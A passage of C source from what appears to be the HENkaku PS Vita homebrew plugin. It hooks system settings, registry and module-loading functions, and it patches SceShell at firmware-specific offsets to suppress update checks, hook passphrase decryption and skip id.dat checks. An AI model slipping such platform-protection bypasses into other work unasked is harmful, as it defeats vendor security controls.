303 |     case SCE_SYSTEM_PARAM_LANG_DUTCH:         language_container = &language_dutch;         break;
304 |     case SCE_SYSTEM_PARAM_LANG_PORTUGUESE_PT: language_container = &language_portuguese_pt; break;
305 |     case SCE_SYSTEM_PARAM_LANG_RUSSIAN:       language_container = &language_russian;       break;
306 |     case SCE_SYSTEM_PARAM_LANG_KOREAN:        language_container = &language_korean;        break;
307 |     case SCE_SYSTEM_PARAM_LANG_CHINESE_T:     language_container = &language_chinese_t;     break;
308 |     case SCE_SYSTEM_PARAM_LANG_CHINESE_S:     language_container = &language_chinese_s;     break;
309 |     case SCE_SYSTEM_PARAM_LANG_FINNISH:       language_container = &language_finnish;       break;
310 |     case SCE_SYSTEM_PARAM_LANG_SWEDISH:       language_container = &language_swedish;       break;
311 |     case SCE_SYSTEM_PARAM_LANG_DANISH:        language_container = &language_danish;        break;
312 |     case SCE_SYSTEM_PARAM_LANG_NORWEGIAN:     language_container = &language_norwegian;     break;
313 |     case SCE_SYSTEM_PARAM_LANG_POLISH:        language_container = &language_polish;        break;
314 |     case SCE_SYSTEM_PARAM_LANG_PORTUGUESE_BR: language_container = &language_portuguese_br; break;
315 |     case SCE_SYSTEM_PARAM_LANG_ENGLISH_GB:    language_container = &language_english_gb;    break;
316 |     case SCE_SYSTEM_PARAM_LANG_TURKISH:       language_container = &language_turkish;       break;
317 |     default:                                  language_container = &language_english_us;    break;
318 |   }
319 |   if (msg && sceClibStrncmp(*msg, "msg_", 4) == 0) {
320 |     #define LANGUAGE_ENTRY(name) \
321 |       else if (sceClibStrncmp(*msg, #name, sizeof(#name)) == 0) { \
322 |         return language_container->name; \
323 |       }
324 |     if (0) {}
325 |     LANGUAGE_ENTRY(msg_henkaku_settings)
326 |     LANGUAGE_ENTRY(msg_enable_psn_spoofing)
327 |     LANGUAGE_ENTRY(msg_enable_unsafe_homebrew)
328 |     LANGUAGE_ENTRY(msg_unsafe_homebrew_description)
329 |     LANGUAGE_ENTRY(msg_enable_version_spoofing)
330 |     LANGUAGE_ENTRY(msg_spoofed_version)
331 |     LANGUAGE_ENTRY(msg_button_behavior)
332 |     LANGUAGE_ENTRY(msg_button_enter)
333 |     LANGUAGE_ENTRY(msg_button_cancel)
334 |     LANGUAGE_ENTRY(msg_reload_taihen_config)
335 |     LANGUAGE_ENTRY(msg_reload_taihen_config_success)
336 |     LANGUAGE_ENTRY(msg_reboot_device)
337 |     LANGUAGE_ENTRY(msg_content_downloader)
338 |     LANGUAGE_ENTRY(msg_unlink_memory_card)
339 |     LANGUAGE_ENTRY(msg_unlink_memory_card_success)
340 |     LANGUAGE_ENTRY(msg_unlink_memory_card_error)
341 |     #undef LANGUAGE_ENTRY
342 |   }
343 |   return TAI_CONTINUE(wchar_t *, g_scePafToplevelGetText_SceSystemSettingsCore_hook, arg, msg);
344 | }
345 | 
346 | static SceUID g_system_settings_core_modid = -1;
347 | static tai_hook_ref_t g_sceKernelLoadStartModule_SceSettings_hook;
348 | static SceUID sceKernelLoadStartModule_SceSettings_patched(char *path, SceSize args, void *argp, int flags, SceKernelLMOption *option, int *status) {
349 |   SceUID ret = TAI_CONTINUE(SceUID, g_sceKernelLoadStartModule_SceSettings_hook, path, args, argp, flags, option, status);
350 |   if (ret >= 0 && sceClibStrncmp(path, "vs0:app/NPXS10015/system_settings_core.suprx", 44) == 0) {
351 |     g_system_settings_core_modid = ret;
352 |     g_hooks[7] = taiHookFunctionImport(&g_scePafToplevelInitPluginFunctions_SceSettings_hook, 
353 |                                         "SceSettings", 
354 |                                         0x4D9A9DD0, // ScePafToplevel
355 |                                         0xF5354FEF, 
356 |                                         scePafToplevelInitPluginFunctions_SceSettings_patched);
357 |     g_hooks[8] = taiHookFunctionImport(&g_scePafMiscLoadXmlLayout_SceSettings_hook, 
358 |                                         "SceSettings", 
359 |                                         0x3D643CE8, // ScePafMisc
360 |                                         0x19FE55A8, 
361 |                                         scePafMiscLoadXmlLayout_SceSettings_patched);
362 |     g_hooks[9] = taiHookFunctionImport(&g_sceRegMgrGetKeyInt_SceSystemSettingsCore_hook, 
363 |                                         "SceSystemSettingsCore", 
364 |                                         0xC436F916, // SceRegMgr
365 |                                         0x16DDF3DC, 
366 |                                         sceRegMgrGetKeyInt_SceSystemSettingsCore_patched);
367 |     g_hooks[10] = taiHookFunctionImport(&g_sceRegMgrSetKeyInt_SceSystemSettingsCore_hook, 
368 |                                         "SceSystemSettingsCore", 
369 |                                         0xC436F916, // SceRegMgr
370 |                                         0xD72EA399, 
371 |                                         sceRegMgrSetKeyInt_SceSystemSettingsCore_patched);
372 |     g_hooks[11] = taiHookFunctionImport(&g_sceRegMgrGetKeyStr_SceSystemSettingsCore_hook, 
373 |                                         "SceSystemSettingsCore", 
374 |                                         0xC436F916, // SceRegMgr
375 |                                         0xE188382F, 
376 |                                         sceRegMgrGetKeyStr_SceSystemSettingsCore_patched);
377 |     g_hooks[12] = taiHookFunctionImport(&g_sceRegMgrSetKeyStr_SceSystemSettingsCore_hook, 
378 |                                         "SceSystemSettingsCore", 
379 |                                         0xC436F916, // SceRegMgr
380 |                                         0x41D320C5, 
381 |                                         sceRegMgrSetKeyStr_SceSystemSettingsCore_patched);
382 |     g_hooks[13] = taiHookFunctionImport(&g_sceRegMgrGetKeysInfo_SceSystemSettingsCore_hook, 
383 |                                         "SceSystemSettingsCore", 
384 |                                         0xC436F916, // SceRegMgr
385 |                                         0x58421DD1, 
386 |                                         sceRegMgrGetKeysInfo_SceSystemSettingsCore_patched);
387 |     g_hooks[14] = taiHookFunctionImport(&g_scePafToplevelGetText_SceSystemSettingsCore_hook, 
388 |                                         "SceSystemSettingsCore", 
389 |                                         0x4D9A9DD0, // ScePafToplevel
390 |                                         0x19CEFDA7, 
391 |                                         scePafToplevelGetText_SceSystemSettingsCore_patched);
392 |   }
393 |   return ret;
394 | }
395 | 
396 | static tai_hook_ref_t g_sceKernelStopUnloadModule_SceSettings_hook;
397 | static int sceKernelStopUnloadModule_SceSettings_patched(SceUID modid, SceSize args, void *argp, int flags, SceKernelULMOption *option, int *status) {
398 |   if (modid == g_system_settings_core_modid) {
399 |     g_system_settings_core_modid = -1;
400 |     if (g_hooks[7] >= 0) taiHookRelease(g_hooks[7], g_scePafToplevelInitPluginFunctions_SceSettings_hook);
401 |     if (g_hooks[8] >= 0) taiHookRelease(g_hooks[8], g_scePafMiscLoadXmlLayout_SceSettings_hook);
402 |     if (g_hooks[9] >= 0) taiHookRelease(g_hooks[9], g_sceRegMgrGetKeyInt_SceSystemSettingsCore_hook);
403 |     if (g_hooks[10] >= 0) taiHookRelease(g_hooks[10], g_sceRegMgrSetKeyInt_SceSystemSettingsCore_hook);
404 |     if (g_hooks[11] >= 0) taiHookRelease(g_hooks[11], g_sceRegMgrGetKeyStr_SceSystemSettingsCore_hook);
405 |     if (g_hooks[12] >= 0) taiHookRelease(g_hooks[12], g_sceRegMgrSetKeyStr_SceSystemSettingsCore_hook);
406 |     if (g_hooks[13] >= 0) taiHookRelease(g_hooks[13], g_sceRegMgrGetKeysInfo_SceSystemSettingsCore_hook);
407 |     if (g_hooks[14] >= 0) taiHookRelease(g_hooks[14], g_scePafToplevelGetText_SceSystemSettingsCore_hook);
408 |   }
409 |   return TAI_CONTINUE(int, g_sceKernelStopUnloadModule_SceSettings_hook, modid, args, argp, flags, option, status);
410 | }
411 | 
412 | void _start() __attribute__ ((weak, alias ("module_start")));
413 | int module_start(SceSize argc, const void *args) {
414 |   tai_module_info_t info;
415 |   LOG("loading HENkaku config for user");
416 |   load_config_user();
417 |   g_hooks[0] = taiHookFunctionImport(&g_sceKernelLoadStartModule_SceSettings_hook, 
418 |                                       "SceSettings", 
419 |                                       0xCAE9ACE6, // SceLibKernel
420 |                                       0x2DCC4AFA, 
421 |                                       sceKernelLoadStartModule_SceSettings_patched);
422 |   LOG("sceKernelLoadStartModule hook: %x", g_hooks[0]);
423 |   g_hooks[1] = taiHookFunctionImport(&g_sceKernelStopUnloadModule_SceSettings_hook, 
424 |                                       "SceSettings", 
425 |                                       0xCAE9ACE6, // SceLibKernel
426 |                                       0x2415F8A4, 
427 |                                       sceKernelStopUnloadModule_SceSettings_patched);
428 |   LOG("sceKernelStopUnloadModule hook: %x", g_hooks[1]);
429 |   g_hooks[2] = taiHookFunctionImport(&g_sceKernelGetSystemSwVersion_SceSettings_hook, 
430 |                                       "SceSettings", 
431 |                                       0xEAED1616, // SceModulemgr
432 |                                       0x5182E212, 
433 |                                       sceKernelGetSystemSwVersion_SceSettings_patched);
434 |   LOG("sceKernelGetSystemSwVersion hook: %x", g_hooks[2]);
435 |   g_hooks[3] = g_hooks[4] = g_hooks[5] = -1;
436 |   info.size = sizeof(info);
437 |   if (taiGetModuleInfo("SceShell", &info) >= 0) {
438 |     if (config.use_psn_spoofing) {
439 |       // we don't have a nice clean way of doing PSN spoofing (update prompt disable) so 
440 |       // we are stuck with hard coding offsets. Since module NID is different for each 
441 |       // version and retail/dex/test unit, this should allow us to specify different 
442 |       // offsets.
443 |       switch (info.module_nid) {
444 |         case 0x0552F692: { // retail 3.60 SceShell
445 |           g_hooks[3] = taiHookFunctionOffset(&g_update_check_hook, 
446 |                                              info.modid, 
447 |                                              0,         // segidx
448 |                                              0x363de8,  // offset
449 |                                              1,         // thumb
450 |                                              update_check_patched);
451 |           g_hooks[4] = taiHookFunctionOffset(&g_game_update_check_hook, 
452 |                                              info.modid, 
453 |                                              0,         // segidx
454 |                                              0x37beda,  // offset
455 |                                              1,         // thumb
456 |                                              game_update_check_patched);
457 |           g_hooks[5] = taiHookFunctionOffset(&g_passphrase_decrypt_hook, 
458 |                                              info.modid, 
459 |                                              0,         // segidx
460 |                                              0x325230,  // offset
461 |                                              1,         // thumb
462 |                                              passphrase_decrypt_patched);
463 |           break;
464 |         }
465 |         case 0xEAB89D5C: { // PTEL 3.60 SceShell thanks to CelesteBlue for offsets
466 |           g_hooks[3] = taiHookFunctionOffset(&g_update_check_hook, 
467 |                                              info.modid, 
468 |                                              0,         // segidx
469 |                                              0x35A830,  // offset
470 |                                              1,         // thumb
471 |                                              update_check_patched);
472 |           g_hooks[4] = taiHookFunctionOffset(&g_game_update_check_hook, 
473 |                                              info.modid, 
474 |                                              0,         // segidx
475 |                                              0x372832,  // offset
476 |                                              1,         // thumb
477 |                                              game_update_check_patched);
478 |           g_hooks[5] = taiHookFunctionOffset(&g_passphrase_decrypt_hook, 
479 |                                              info.modid, 
480 |                                              0,         // segidx
481 |                                              0x31BC78,  // offset
482 |                                              1,         // thumb
483 |                                              passphrase_decrypt_patched);
484 |           break;
485 |         }
486 |         case 0x6CB01295: { // PDEL 3.60 SceShell thanks to anonymous for offsets
487 |           g_hooks[3] = taiHookFunctionOffset(&g_update_check_hook, 
488 |                                              info.modid, 
489 |                                              0,         // segidx
490 |                                              0x12c882,  // offset
491 |                                              1,         // thumb
492 |                                              update_check_patched);
493 |           g_hooks[4] = taiHookFunctionOffset(&g_game_update_check_hook, 
494 |                                              info.modid, 
495 |                                              0,         // segidx
496 |                                              0x36df3e,  // offset
497 |                                              1,         // thumb
498 |                                              game_update_check_patched);
499 |           g_hooks[5] = taiHookFunctionOffset(&g_passphrase_decrypt_hook, 
500 |                                              info.modid, 
501 |                                              0,         // segidx
502 |                                              0x317384,  // offset
503 |                                              1,         // thumb
504 |                                              passphrase_decrypt_patched);
505 |           break;
506 |         }
507 |         case 0x5549BF1F:   // retail 3.65 SceShell
508 |         case 0x34B4D82E:   // retail 3.67 SceShell
509 |         case 0x12DAC0F3: { // retail 3.68 SceShell
510 |           g_hooks[3] = taiHookFunctionOffset(&g_update_check_hook, 
511 |                                              info.modid, 
512 |                                              0,         // segidx
513 |                                              0x36422c,  // offset
514 |                                              1,         // thumb
515 |                                              update_check_patched);
516 |           g_hooks[4] = taiHookFunctionOffset(&g_game_update_check_hook, 
517 |                                              info.modid, 
518 |                                              0,         // segidx
519 |                                              0x37c31e,  // offset
520 |                                              1,         // thumb
521 |                                              game_update_check_patched);
522 |           g_hooks[5] = taiHookFunctionOffset(&g_passphrase_decrypt_hook, 
523 |                                              info.modid, 
524 |                                              0,         // segidx
525 |                                              0x325674,  // offset
526 |                                              1,         // thumb
527 |                                              passphrase_decrypt_patched);
528 |           break;
529 |         }
530 |         default: {
531 |           LOG("SceShell NID %X not recognized, skipping PSN spoofing patches", info.module_nid);
532 |         }
533 |       }
534 |     }
535 |     // add patch to skip id.dat checks (only works if plugin loads before start)
536 |     g_hooks[6] = taiHookFunctionImport(&g_SceVshBridge_333875AB_SceShell_hook, 
537 |                                         "SceShell", 
538 |                                         0x35C5ACD4, // SceVshBridge
539 |                                         0x333875AB, 
540 |                                         SceVshBridge_333875AB_SceShell_patched);
541 |   } else {
542 |     LOG("skipping psn spoofing patches");
543 |   }
544 |   return SCE_KERNEL_START_SUCCESS;
545 | }
546 | 
547 | int module_stop(SceSize argc, const void *args) {
548 |   LOG("stopping module");
549 |   // free hooks that didn't fail
550 |   if (g_hooks[0] >= 0) taiHookRelease(g_hooks[0], g_sceKernelLoadStartModule_SceSettings_hook);
551 |   if (g_hooks[1] >= 0) taiHookRelease(g_hooks[1], g_sceKernelStopUnloadModule_SceSettings_hook);
552 |   if (g_hooks[2] >= 0) taiHookRelease(g_hooks[2], g_sceKernelGetSystemSwVersion_SceSettings_hook);
553 |   if (g_hooks[3] >= 0) taiHookRelease(g_hooks[3], g_update_check_hook);
554 |   if (g_hooks[4] >= 0) taiHookRelease(g_hooks[4], g_game_update_check_hook);
555 |   if (g_hooks[5] >= 0) taiHookRelease(g_hooks[5], g_passphrase_decrypt_hook);
556 |   if (g_hooks[6] >= 0) taiHookRelease(g_hooks[6], g_SceVshBridge_333875AB_SceShell_hook);
557 |   return SCE_KERNEL_STOP_SUCCESS;
558 | }
559 | 


--------------------------------------------------------------------------------